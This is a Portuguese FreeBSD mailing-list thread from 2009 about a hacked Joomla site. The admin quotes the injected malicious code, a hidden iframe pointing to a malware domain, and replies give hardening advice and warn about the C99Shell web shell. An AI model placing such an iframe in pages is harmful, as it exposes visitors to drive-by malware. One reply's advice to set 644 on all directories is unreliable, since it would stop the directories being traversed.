On Tue, 13 Jan 2009 17:27:39 +0000, Marcello wrote > O causa mais provavel devem ser o dono do arquivo e permissão de > gravação , o log do apache pode te fornecer algumas dicas de quando isso > ocorreu. > > Verifique se dono do arquivo for www:www , deixe root:www, mas o melhor > seria um grupo joomla ou um usuario qualquer diferente do apache. > > Colocar a pasta publica do apache em uma partição montada com noexec > e nosuid é um excelente modo de evitar supresas. > > Agora isso é furo da aplicação , do joomla que permitiu o uso de > algum script . > > Abraços
Verifique se não houve a instalação de um aplicativo chamado C99Shell ou algo semelhante ... é um aplicativa em PHP que infelismente arromba o server, pos da para acessar todos os conteúdos que houver permissão de leitura Infelismente tive essa desagradavel surpresa em meu servidor no meio do ano passado, e foi atraves de php injection (falha de segurança no aplicativo) uma das soluções atodada foi colocar apenas os attrib 644 em todos os diretorios e sub-diretorios do /usr/local/www e a atualização das aplicações. A minha sorte foi que aparentemente foi um scriptkids que não sabia muito bem o que estava fazendo .... É terrível vc passar por uma situação assim :( Se precisar de ajuda, peça. > > Em Ter, 2009-01-13 às 14:21 -0400, Siclal Oliveira escreveu: > > Olá lista > > > > Esta é minha primeira participação na lista. > > Já trabalho há algum tempo com Freebsd, de forma que espero poder > > contribuir de alguma forma. > > > > Bem, estou com um problema em um dos servidores que administro: > > O servidor roda Freebsd 7.0 release Amd64, com as últimas versões do > > php e do mysql atualizados. > > Ocorre que o meu cliente usa Joomla e algumas das funções exigiram que > > eu desabilitasse o safe mode do php. > > A atualização do Joomla ficaria por conta dele, mas para a minha > > surpresa, atualmente está utilizando a versão 1.0.15, quando a mais > > atualizada seria a 1.5.9. > > Fui chamado porque ao abrir a página era startado um direcionamento a > > uma página com vírus. > > Verificando o index, percebi que havia sido inserido um código > > malicioso não última linha: > > > > <html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola8"; > > width=1 > > height=1 style="visibility: hidden"></iframe></body></html> > > > > Eu imagino que a insersão deva ter ocorrido a partir de alguma falha > > do joomla, mas gostaria de saber como proceder com os logs a fim de > > identificar este incidente. > > Como eu poderia saber se o meu servidor foi afetado gravemente. > > > > Desde já agradeço. > > > > Abraços a todos. > > > > Siclal > > ------------------------- > > Histórico: http://www.fug.com.br/historico/html/freebsd/ > > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd > > ------------------------- > Histórico: http://www.fug.com.br/historico/html/freebsd/ > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- Nilton José Rizzo 805 Informatica Disseminando tecnologias 021 2413 9786 ------------------------- Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
